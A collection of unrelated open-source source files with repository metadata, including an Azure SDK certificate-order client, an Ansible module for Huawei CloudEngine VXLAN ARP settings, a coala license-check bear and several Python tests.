# type: (...) -> List["_models.CertificateOrderAction"]
"""Retrieve the list of certificate actions.
Retrieve the list of certificate actions.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the certificate order.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: list of CertificateOrderAction, or the result of cls(response)
:rtype: list[~azure.mgmt.web.v2018_02_01.models.CertificateOrderAction]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[List["_models.CertificateOrderAction"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
accept = "application/json"
# Construct URL
url = self.retrieve_certificate_actions.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('[CertificateOrderAction]', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
retrieve_certificate_actions.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{name}/retrieveCertificateActions'} # type: ignore
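# Usage sketch (assumes the `client` shown above); note that this action
# takes the order name as `name` and returns a plain list, not an ItemPaged:
#   actions = client.app_service_certificate_orders.retrieve_certificate_actions(
#       "my-rg", "my-order")
#   for action in actions:
#       print(action.action_type, action.created_at)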
def retrieve_certificate_email_history(
self,
resource_group_name, # type: str
name, # type: str
**kwargs # type: Any
):
# type: (...) -> List["_models.CertificateEmail"]
"""Retrieve email history.
Retrieve email history.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the certificate order.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: list of CertificateEmail, or the result of cls(response)
:rtype: list[~azure.mgmt.web.v2018_02_01.models.CertificateEmail]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[List["_models.CertificateEmail"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
accept = "application/json"
# Construct URL
url = self.retrieve_certificate_email_history.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('[CertificateEmail]', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
retrieve_certificate_email_history.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{name}/retrieveEmailHistory'} # type: ignore
| mit |
laurentb/weboob | modules/dlfp/pages/board.py | 2 | 2106 | # -*- coding: utf-8 -*-
# Copyright(C) 2010-2011 Romain Bignon
#
# This file is part of a weboob module.
#
# This weboob module is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This weboob module is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this weboob module. If not, see <http://www.gnu.org/licenses/>.
import re
from logging import warning
from weboob.browser.pages import HTMLPage, LoggedPage
class Message(object):
TIMESTAMP_REGEXP = re.compile(r'(\d{4})(\d{2})(\d{2})(\d{2})(\d{2})(\d{2})')
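    # Timestamps are presumably 14-digit "YYYYMMDDHHMMSS" strings, e.g.
    # "20110131124503" -> norloge "12:45:03" (groups 4-6 of the regexp).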
def __init__(self, id, timestamp, login, message, is_me):
self.id = id
self.timestamp = timestamp
self.login = login
self.message = message
self.is_me = is_me
self.norloge = timestamp
m = self.TIMESTAMP_REGEXP.match(timestamp)
if m:
self.norloge = '%02d:%02d:%02d' % (int(m.group(4)),
int(m.group(5)),
int(m.group(6)))
else:
warning('Unable to parse timestamp "%s"' % timestamp)
class BoardIndexPage(LoggedPage, HTMLPage):
def get_messages(self, last=None):
msgs = []
for post in self.doc.xpath('//post'):
m = Message(int(post.attrib['id']),
post.attrib['time'],
post.find('login').text,
post.find('message').text,
post.find('login').text.lower() == self.browser.username.lower())
if last is not None and last == m.id:
break
msgs.append(m)
return msgs
| lgpl-3.0 |
bala4901/odoo | addons/l10n_ch/__openerp__.py | 160 | 2936 | # -*- coding: utf-8 -*-
##############################################################################
#
# Author: Nicolas Bessi. Copyright Camptocamp SA
# Financial contributors: Hasa SA, Open Net SA,
# Prisme Solutions Informatique SA, Quod SA
#
# Translation contributors: brain-tec AG, Agile Business Group
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{'name': 'Switzerland - Accounting',
'description': """
Swiss localization
==================
**Multilang swiss STERCHI account chart and taxes**
**Author:** Camptocamp SA
**Financial contributors:** Prisme Solutions Informatique SA, Quod SA
**Translation contributors:** brain-tec AG, Agile Business Group
**This release will introduce major changes to l10n_ch.**
Due to important refactoring needs and Switzerland's adoption of a new international payment standard during 2013-2014, we have reorganised the swiss localization addons this way:
- **l10n_ch**: Multilang swiss STERCHI account chart and taxes (official addon)
- **l10n_ch_base_bank**: Technical module that introduces a new and simplified version of bank type management
- **l10n_ch_bank**: List of swiss banks
- **l10n_ch_zip**: List of swiss postal zip
- **l10n_ch_dta**: Support of dta payment protocol (will be deprecated end 2014)
- **l10n_ch_payment_slip**: Support of ESR/BVR payment slip report and reconciliation. Report refactored with easy element positioning.
- **l10n_ch_sepa**: Alpha implementation of PostFinance SEPA/PAIN support will be completed during 2013/2014
The modules will soon be available on OpenERP swiss localization on launchpad:
https://launchpad.net/openerp-swiss-localization
""",
'version': '7.0',
'author': 'Camptocamp',
'category': 'Localization/Account Charts',
'website': 'http://www.camptocamp.com',
'depends': ['account', 'l10n_multilang'],
'data': ['sterchi_chart/account.xml',
'sterchi_chart/vat2011.xml',
'sterchi_chart/fiscal_position.xml' ],
'demo': [],
'test': [],
'auto_install': False,
'installable': True,
'images': ['images/config_chart_l10n_ch.jpeg','images/l10n_ch_chart.jpeg']
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
openstack/barbican | barbican/tests/queue/test_client.py | 1 | 2387 | # Copyright (c) 2013-2014 Rackspace, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest import mock
from barbican import queue
from barbican.queue import client
from barbican.tests import utils
class WhenUsingAsyncTaskClient(utils.BaseTestCase):
"""Test using the asynchronous task client."""
def setUp(self):
super(WhenUsingAsyncTaskClient, self).setUp()
# Mock out the queue get_client() call:
self.mock_client = mock.MagicMock()
self.mock_client.cast.return_value = None
get_client_config = {
'return_value': self.mock_client
}
self.get_client_patcher = mock.patch(
'barbican.queue.get_client',
**get_client_config
)
self.get_client_patcher.start()
self.client = client.TaskClient()
def tearDown(self):
super(WhenUsingAsyncTaskClient, self).tearDown()
self.get_client_patcher.stop()
def test_should_process_type_order(self):
self.client.process_type_order(order_id=self.order_id,
project_id=self.external_project_id,
request_id=self.request_id)
self.mock_client.cast.assert_called_with(
{}, 'process_type_order', order_id=self.order_id,
project_id=self.external_project_id,
request_id=self.request_id)
class WhenCreatingDirectTaskClient(utils.BaseTestCase):
"""Test using the synchronous task client (i.e. standalone mode)."""
def setUp(self):
super(WhenCreatingDirectTaskClient, self).setUp()
queue.get_client = mock.MagicMock(return_value=None)
self.client = client.TaskClient()
def test_should_use_direct_task_client(self):
self.assertIsInstance(self.client._client,
client._DirectTaskInvokerClient)
| apache-2.0 |
switchboardOp/ansible | lib/ansible/modules/network/cloudengine/ce_vxlan_arp.py | 46 | 24139 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.0'}
DOCUMENTATION = """
---
module: ce_vxlan_arp
version_added: "2.4"
short_description: Manages ARP attributes of VXLAN on HUAWEI CloudEngine devices.
description:
- Manages ARP attributes of VXLAN on HUAWEI CloudEngine devices.
author: QijunPan (@CloudEngine-Ansible)
options:
evn_bgp:
description:
- Enables EVN BGP.
required: false
choices: ['enable', 'disable']
default: null
evn_source_ip:
description:
- Specifies the source address of an EVN BGP peer.
The value is in dotted decimal notation.
required: false
default: null
evn_peer_ip:
description:
- Specifies the IP address of an EVN BGP peer.
The value is in dotted decimal notation.
required: false
default: null
evn_server:
description:
            - Configures the local device as the route reflector (RR) on the EVN network.
required: false
choices: ['enable', 'disable']
default: null
evn_reflect_client:
description:
- Configures the local device as the route reflector (RR) and its peer as the client.
required: false
choices: ['enable', 'disable']
default: null
vbdif_name:
description:
            - Full name of VBDIF interface, e.g. Vbdif100.
required: false
default: null
arp_collect_host:
description:
- Enables EVN BGP or BGP EVPN to collect host information.
required: false
choices: ['enable', 'disable']
default: null
host_collect_protocol:
description:
- Enables EVN BGP or BGP EVPN to advertise host information.
required: false
choices: ['bgp','none']
default: null
bridge_domain_id:
description:
- Specifies a BD(bridge domain) ID.
The value is an integer ranging from 1 to 16777215.
required: false
default: null
arp_suppress:
description:
- Enables ARP broadcast suppression in a BD.
required: false
choices: ['enable', 'disable']
default: null
state:
description:
- Determines whether the config should be present or not
on the device.
required: false
default: present
choices: ['present', 'absent']
"""
EXAMPLES = '''
- name: vxlan arp module test
hosts: ce128
connection: local
gather_facts: no
vars:
cli:
host: "{{ inventory_hostname }}"
port: "{{ ansible_ssh_port }}"
username: "{{ username }}"
password: "{{ password }}"
transport: cli
tasks:
- name: Configure EVN BGP on Layer 2 and Layer 3 VXLAN gateways to establish EVN BGP peer relationships.
ce_vxlan_arp:
evn_bgp: enable
evn_source_ip: 6.6.6.6
evn_peer_ip: 7.7.7.7
provider: "{{ cli }}"
- name: Configure a Layer 3 VXLAN gateway as a BGP RR.
ce_vxlan_arp:
evn_bgp: enable
evn_server: enable
provider: "{{ cli }}"
- name: Enable EVN BGP on a Layer 3 VXLAN gateway to collect host information.
ce_vxlan_arp:
vbdif_name: Vbdif100
arp_collect_host: enable
provider: "{{ cli }}"
- name: Enable Layer 2 and Layer 3 VXLAN gateways to use EVN BGP to advertise host information.
ce_vxlan_arp:
host_collect_protocol: bgp
provider: "{{ cli }}"
- name: Enable ARP broadcast suppression on a Layer 2 VXLAN gateway.
ce_vxlan_arp:
bridge_domain_id: 100
arp_suppress: enable
provider: "{{ cli }}"
'''
RETURN = '''
proposed:
description: k/v pairs of parameters passed into module
returned: verbose mode
type: dict
sample: {"evn_bgp": "enable", "evn_source_ip": "6.6.6.6", "evn_peer_ip":"7.7.7.7", state: "present"}
existing:
description: k/v pairs of existing configuration
returned: verbose mode
type: dict
sample: {"evn_bgp": "disable", "evn_source_ip": null, "evn_peer_ip": []}
end_state:
description: k/v pairs of configuration after module execution
returned: verbose mode
type: dict
sample: {"evn_bgp": "enable", "evn_source_ip": "6.6.6.6", "evn_peer_ip": ["7.7.7.7"]}
updates:
description: commands sent to the device
returned: always
type: list
sample: ["evn bgp",
"source-address 6.6.6.6",
"peer 7.7.7.7"]
changed:
description: check to see if a change was made on the device
returned: always
type: boolean
sample: true
'''
import re
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ce import get_config, load_config
from ansible.module_utils.ce import ce_argument_spec
def is_config_exist(cmp_cfg, test_cfg):
"""is configuration exist"""
if not cmp_cfg or not test_cfg:
return False
return bool(test_cfg in cmp_cfg)
def is_valid_v4addr(addr):
"""check is ipv4 addr is valid"""
if addr.count('.') == 3:
addr_list = addr.split('.')
if len(addr_list) != 4:
return False
for each_num in addr_list:
if not each_num.isdigit():
return False
if int(each_num) > 255:
return False
return True
return False
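# Expected behaviour, for illustration:
#   is_valid_v4addr("10.0.0.1")   -> True
#   is_valid_v4addr("10.0.0.256") -> False (octet out of range)
#   is_valid_v4addr("10.0.0")     -> False (too few octets)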
def get_evn_peers(config):
"""get evn peer ip list"""
get = re.findall(r"peer ([0-9]+.[0-9]+.[0-9]+.[0-9]+)", config)
if not get:
return None
else:
return list(set(get))
def get_evn_source(config):
    """get evn source ip"""
    get = re.findall(
        r"source-address ([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)", config)
if not get:
return None
else:
return get[0]
def get_evn_reflect_client(config):
"""get evn reflect client list"""
get = re.findall(
r"peer ([0-9]+.[0-9]+.[0-9]+.[0-9]+)\s*reflect-client", config)
if not get:
return None
else:
return list(get)
class VxlanArp(object):
"""
Manages arp attributes of VXLAN.
"""
def __init__(self, argument_spec):
self.spec = argument_spec
self.module = None
self.init_module()
# module input info
self.evn_bgp = self.module.params['evn_bgp']
self.evn_source_ip = self.module.params['evn_source_ip']
self.evn_peer_ip = self.module.params['evn_peer_ip']
self.evn_server = self.module.params['evn_server']
self.evn_reflect_client = self.module.params['evn_reflect_client']
self.vbdif_name = self.module.params['vbdif_name']
self.arp_collect_host = self.module.params['arp_collect_host']
self.host_collect_protocol = self.module.params[
'host_collect_protocol']
self.bridge_domain_id = self.module.params['bridge_domain_id']
self.arp_suppress = self.module.params['arp_suppress']
self.state = self.module.params['state']
# host info
self.host = self.module.params['host']
self.username = self.module.params['username']
self.port = self.module.params['port']
# state
self.config = "" # current config
self.changed = False
self.updates_cmd = list()
self.commands = list()
self.results = dict()
self.proposed = dict()
self.existing = dict()
self.end_state = dict()
def init_module(self):
"""init module"""
required_together = [("vbdif_name", "arp_collect_host"), ("bridge_domain_id", "arp_suppress")]
self.module = AnsibleModule(argument_spec=self.spec,
required_together=required_together,
supports_check_mode=True)
def cli_load_config(self, commands):
"""load config by cli"""
if not self.module.check_mode:
load_config(self.module, commands)
def get_current_config(self):
"""get current configuration"""
flags = list()
exp = "| ignore-case section include evn bgp|host collect protocol bgp"
if self.vbdif_name:
exp += "|^interface %s$" % self.vbdif_name
if self.bridge_domain_id:
exp += "|^bridge-domain %s$" % self.bridge_domain_id
flags.append(exp)
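        # With e.g. vbdif_name="Vbdif100" and bridge_domain_id="100", exp
        # becomes: "| ignore-case section include evn bgp|host collect
        # protocol bgp|^interface Vbdif100$|^bridge-domain 100$"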
config = get_config(self.module, flags)
return config
def cli_add_command(self, command, undo=False):
"""add command to self.update_cmd and self.commands"""
if undo and command.lower() not in ["quit", "return"]:
cmd = "undo " + command
else:
cmd = command
self.commands.append(cmd) # set to device
if command.lower() not in ["quit", "return"]:
self.updates_cmd.append(cmd) # show updates result
def config_bridge_domain(self):
"""manage bridge domain configuration"""
if not self.bridge_domain_id:
return
# bridge-domain bd-id
# [undo] arp broadcast-suppress enable
cmd = "bridge-domain %s" % self.bridge_domain_id
if not is_config_exist(self.config, cmd):
self.module.fail_json(msg="Error: Bridge domain %s is not exist." % self.bridge_domain_id)
cmd = "arp broadcast-suppress enable"
exist = is_config_exist(self.config, cmd)
if self.arp_suppress == "enable" and not exist:
self.cli_add_command("bridge-domain %s" % self.bridge_domain_id)
self.cli_add_command(cmd)
self.cli_add_command("quit")
elif self.arp_suppress == "disable" and exist:
self.cli_add_command("bridge-domain %s" % self.bridge_domain_id)
self.cli_add_command(cmd, undo=True)
self.cli_add_command("quit")
def config_evn_bgp(self):
"""enables EVN BGP and configure evn bgp command"""
evn_bgp_view = False
evn_bgp_enable = False
cmd = "evn bgp"
exist = is_config_exist(self.config, cmd)
if self.evn_bgp == "enable" or exist:
evn_bgp_enable = True
# [undo] evn bgp
if self.evn_bgp:
if self.evn_bgp == "enable" and not exist:
self.cli_add_command(cmd)
evn_bgp_view = True
elif self.evn_bgp == "disable" and exist:
self.cli_add_command(cmd, undo=True)
return
# [undo] source-address ip-address
if evn_bgp_enable and self.evn_source_ip:
cmd = "source-address %s" % self.evn_source_ip
exist = is_config_exist(self.config, cmd)
if self.state == "present" and not exist:
if not evn_bgp_view:
self.cli_add_command("evn bgp")
evn_bgp_view = True
self.cli_add_command(cmd)
elif self.state == "absent" and exist:
if not evn_bgp_view:
self.cli_add_command("evn bgp")
evn_bgp_view = True
self.cli_add_command(cmd, undo=True)
# [undo] peer ip-address
# [undo] peer ipv4-address reflect-client
if evn_bgp_enable and self.evn_peer_ip:
cmd = "peer %s" % self.evn_peer_ip
exist = is_config_exist(self.config, cmd)
if self.state == "present":
if not exist:
if not evn_bgp_view:
self.cli_add_command("evn bgp")
evn_bgp_view = True
self.cli_add_command(cmd)
if self.evn_reflect_client == "enable":
self.cli_add_command(
"peer %s reflect-client" % self.evn_peer_ip)
else:
if self.evn_reflect_client:
cmd = "peer %s reflect-client" % self.evn_peer_ip
exist = is_config_exist(self.config, cmd)
if self.evn_reflect_client == "enable" and not exist:
if not evn_bgp_view:
self.cli_add_command("evn bgp")
evn_bgp_view = True
self.cli_add_command(cmd)
elif self.evn_reflect_client == "disable" and exist:
if not evn_bgp_view:
self.cli_add_command("evn bgp")
evn_bgp_view = True
self.cli_add_command(cmd, undo=True)
else:
if exist:
if not evn_bgp_view:
self.cli_add_command("evn bgp")
evn_bgp_view = True
self.cli_add_command(cmd, undo=True)
# [undo] server enable
if evn_bgp_enable and self.evn_server:
cmd = "server enable"
exist = is_config_exist(self.config, cmd)
if self.evn_server == "enable" and not exist:
if not evn_bgp_view:
self.cli_add_command("evn bgp")
evn_bgp_view = True
self.cli_add_command(cmd)
elif self.evn_server == "disable" and exist:
if not evn_bgp_view:
self.cli_add_command("evn bgp")
evn_bgp_view = True
self.cli_add_command(cmd, undo=True)
if evn_bgp_view:
self.cli_add_command("quit")
def config_vbdif(self):
"""configure command at the VBDIF interface view"""
# interface vbdif bd-id
# [undo] arp collect host enable
cmd = "interface %s" % self.vbdif_name.lower().capitalize()
exist = is_config_exist(self.config, cmd)
if not exist:
self.module.fail_json(
msg="Error: Interface %s does not exist." % self.vbdif_name)
cmd = "arp collect host enable"
exist = is_config_exist(self.config, cmd)
if self.arp_collect_host == "enable" and not exist:
self.cli_add_command("interface %s" %
self.vbdif_name.lower().capitalize())
self.cli_add_command(cmd)
self.cli_add_command("quit")
elif self.arp_collect_host == "disable" and exist:
self.cli_add_command("interface %s" %
self.vbdif_name.lower().capitalize())
self.cli_add_command(cmd, undo=True)
self.cli_add_command("quit")
    def config_host_collect_protocol(self):
"""Enable EVN BGP or BGP EVPN to advertise host information"""
# [undo] host collect protocol bgp
cmd = "host collect protocol bgp"
exist = is_config_exist(self.config, cmd)
if self.state == "present":
if self.host_collect_protocol == "bgp" and not exist:
self.cli_add_command(cmd)
elif self.host_collect_protocol == "none" and exist:
self.cli_add_command(cmd, undo=True)
else:
if self.host_collect_protocol == "bgp" and exist:
self.cli_add_command(cmd, undo=True)
def is_valid_vbdif(self, ifname):
"""check is interface vbdif is valid"""
if not ifname.upper().startswith('VBDIF'):
return False
        bdid = ifname.replace(" ", "").upper().replace("VBDIF", "")
if not bdid.isdigit():
return False
if int(bdid) < 1 or int(bdid) > 16777215:
return False
return True
def check_params(self):
"""Check all input params"""
# bridge domain id check
if self.bridge_domain_id:
            if not self.bridge_domain_id.isdigit():
                self.module.fail_json(
                    msg="Error: Bridge domain id is not a digit.")
if int(self.bridge_domain_id) < 1 or int(self.bridge_domain_id) > 16777215:
self.module.fail_json(
msg="Error: Bridge domain id is not in the range from 1 to 16777215.")
# evn_source_ip check
if self.evn_source_ip:
if not is_valid_v4addr(self.evn_source_ip):
self.module.fail_json(msg="Error: evn_source_ip is invalid.")
# evn_peer_ip check
if self.evn_peer_ip:
if not is_valid_v4addr(self.evn_peer_ip):
self.module.fail_json(msg="Error: evn_peer_ip is invalid.")
# vbdif_name check
if self.vbdif_name:
self.vbdif_name = self.vbdif_name.replace(
" ", "").lower().capitalize()
if not self.is_valid_vbdif(self.vbdif_name):
self.module.fail_json(msg="Error: vbdif_name is invalid.")
        # evn_reflect_client and evn_peer_ip must be set at the same time
        if self.evn_reflect_client and not self.evn_peer_ip:
            self.module.fail_json(
                msg="Error: evn_reflect_client and evn_peer_ip must be set at the same time.")
        # evn_server and evn_reflect_client cannot be set at the same time
        if self.evn_server == "enable" and self.evn_reflect_client == "enable":
            self.module.fail_json(
                msg="Error: evn_server and evn_reflect_client cannot be set at the same time.")
def get_proposed(self):
"""get proposed info"""
if self.evn_bgp:
self.proposed["evn_bgp"] = self.evn_bgp
if self.evn_source_ip:
self.proposed["evn_source_ip"] = self.evn_source_ip
if self.evn_peer_ip:
self.proposed["evn_peer_ip"] = self.evn_peer_ip
if self.evn_server:
self.proposed["evn_server"] = self.evn_server
if self.evn_reflect_client:
self.proposed["evn_reflect_client"] = self.evn_reflect_client
if self.arp_collect_host:
self.proposed["arp_collect_host"] = self.arp_collect_host
if self.host_collect_protocol:
self.proposed["host_collect_protocol"] = self.host_collect_protocol
if self.arp_suppress:
self.proposed["arp_suppress"] = self.arp_suppress
if self.vbdif_name:
self.proposed["vbdif_name"] = self.evn_peer_ip
if self.bridge_domain_id:
self.proposed["bridge_domain_id"] = self.bridge_domain_id
self.proposed["state"] = self.state
def get_existing(self):
"""get existing info"""
evn_bgp_exist = is_config_exist(self.config, "evn bgp")
if evn_bgp_exist:
self.existing["evn_bgp"] = "enable"
else:
self.existing["evn_bgp"] = "disable"
if evn_bgp_exist:
if is_config_exist(self.config, "server enable"):
self.existing["evn_server"] = "enable"
else:
self.existing["evn_server"] = "disable"
self.existing["evn_source_ip"] = get_evn_srouce(self.config)
self.existing["evn_peer_ip"] = get_evn_peers(self.config)
self.existing["evn_reflect_client"] = get_evn_reflect_client(
self.config)
if is_config_exist(self.config, "arp collect host enable"):
self.existing["host_collect_protocol"] = "enable"
else:
self.existing["host_collect_protocol"] = "disable"
if is_config_exist(self.config, "host collect protocol bgp"):
self.existing["host_collect_protocol"] = "bgp"
else:
self.existing["host_collect_protocol"] = None
if is_config_exist(self.config, "arp broadcast-suppress enable"):
self.existing["arp_suppress"] = "enable"
else:
self.existing["arp_suppress"] = "disable"
def get_end_state(self):
"""get end state info"""
config = self.get_current_config()
evn_bgp_exist = is_config_exist(config, "evn bgp")
if evn_bgp_exist:
self.end_state["evn_bgp"] = "enable"
else:
self.end_state["evn_bgp"] = "disable"
if evn_bgp_exist:
if is_config_exist(config, "server enable"):
self.end_state["evn_server"] = "enable"
else:
self.end_state["evn_server"] = "disable"
self.end_state["evn_source_ip"] = get_evn_srouce(config)
self.end_state["evn_peer_ip"] = get_evn_peers(config)
self.end_state[
"evn_reflect_client"] = get_evn_reflect_client(config)
if is_config_exist(config, "arp collect host enable"):
self.end_state["host_collect_protocol"] = "enable"
else:
self.end_state["host_collect_protocol"] = "disable"
if is_config_exist(config, "host collect protocol bgp"):
self.end_state["host_collect_protocol"] = "bgp"
else:
self.end_state["host_collect_protocol"] = None
if is_config_exist(config, "arp broadcast-suppress enable"):
self.end_state["arp_suppress"] = "enable"
else:
self.end_state["arp_suppress"] = "disable"
def work(self):
"""worker"""
self.check_params()
self.config = self.get_current_config()
self.get_existing()
self.get_proposed()
# deal present or absent
if self.evn_bgp or self.evn_server or self.evn_peer_ip or self.evn_source_ip:
self.config_evn_bgp()
if self.vbdif_name and self.arp_collect_host:
self.config_vbdif()
if self.host_collect_protocol:
            self.config_host_collect_protocol()
if self.bridge_domain_id and self.arp_suppress:
self.config_bridge_domain()
if self.commands:
self.cli_load_config(self.commands)
self.changed = True
self.get_end_state()
self.results['changed'] = self.changed
self.results['proposed'] = self.proposed
self.results['existing'] = self.existing
self.results['end_state'] = self.end_state
if self.changed:
self.results['updates'] = self.updates_cmd
else:
self.results['updates'] = list()
self.module.exit_json(**self.results)
def main():
"""Module main"""
argument_spec = dict(
evn_bgp=dict(required=False, type='str',
choices=['enable', 'disable']),
evn_source_ip=dict(required=False, type='str'),
evn_peer_ip=dict(required=False, type='str'),
evn_server=dict(required=False, type='str',
choices=['enable', 'disable']),
evn_reflect_client=dict(
required=False, type='str', choices=['enable', 'disable']),
vbdif_name=dict(required=False, type='str'),
arp_collect_host=dict(required=False, type='str',
choices=['enable', 'disable']),
host_collect_protocol=dict(
required=False, type='str', choices=['bgp', 'none']),
bridge_domain_id=dict(required=False, type='str'),
arp_suppress=dict(required=False, type='str',
choices=['enable', 'disable']),
state=dict(required=False, default='present',
choices=['present', 'absent'])
)
argument_spec.update(ce_argument_spec)
module = VxlanArp(argument_spec)
module.work()
if __name__ == '__main__':
main()
| gpl-3.0 |
aptrishu/coala-bears | bears/general/LicenseCheckBear.py | 13 | 1675 | from coalib.bearlib.abstractions.Linter import linter
from dependency_management.requirements.DistributionRequirement import (
DistributionRequirement)
@linter(executable='licensecheck',
output_format='regex',
output_regex=r'.*: .*UNKNOWN$',
result_message='No license found.')
class LicenseCheckBear:
"""
Attempts to check the given file for a license, by searching the start
of the file for text belonging to various licenses.
    For Ubuntu/Debian users, the ``licensecheck_lines`` option has to be used
    together with the ``licensecheck_tail`` option.
"""
LANGUAGES = {'All'}
REQUIREMENTS = {
DistributionRequirement(
apt_get='devscripts',
dnf='licensecheck',
portage=None,
zypper='devscripts',
),
}
AUTHORS = {'The coala developers'}
AUTHORS_EMAILS = {'[email protected]'}
LICENSE = 'AGPL-3.0'
CAN_DETECT = {'License'}
@staticmethod
def create_arguments(filename, file, config_file,
licensecheck_lines: int=60,
licensecheck_tail: int=5000):
"""
:param licensecheck_lines:
Specify how many lines of the file header should be parsed for
license information. Set to 0 to parse the whole file (and ignore
``licensecheck_tail``).
:param licensecheck_tail:
Specify how many bytes to parse at end of file. Set to 0 to disable
parsing from end of file.
"""
return ('--lines', str(licensecheck_lines), '--tail',
str(licensecheck_tail), filename)
| agpl-3.0 |
di0spyr0s/pants | tests/python/pants_test/tasks/test_jar_task.py | 6 | 11198 | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import os
import re
from collections import defaultdict
from contextlib import contextmanager
from textwrap import dedent
from six.moves import range
from twitter.common.collections import maybe_list
from pants.backend.jvm.targets.java_agent import JavaAgent
from pants.backend.jvm.targets.jvm_binary import JvmBinary
from pants.backend.jvm.tasks.jar_task import JarTask
from pants.base.build_file_aliases import BuildFileAliases
from pants.goal.products import MultipleRootedProducts
from pants.util.contextutil import open_zip, temporary_dir, temporary_file
from pants.util.dirutil import safe_mkdir, safe_mkdtemp, safe_rmtree
from pants_test.jvm.jar_task_test_base import JarTaskTestBase
class BaseJarTaskTest(JarTaskTestBase):
class TestJarTask(JarTask):
def execute(self):
pass
@classmethod
def task_type(cls):
return cls.TestJarTask
@property
def alias_groups(self):
return super(BaseJarTaskTest, self).alias_groups.merge(BuildFileAliases.create(
targets={
'java_agent': JavaAgent,
'jvm_binary': JvmBinary,
},
))
def setUp(self):
super(BaseJarTaskTest, self).setUp()
self.workdir = safe_mkdtemp()
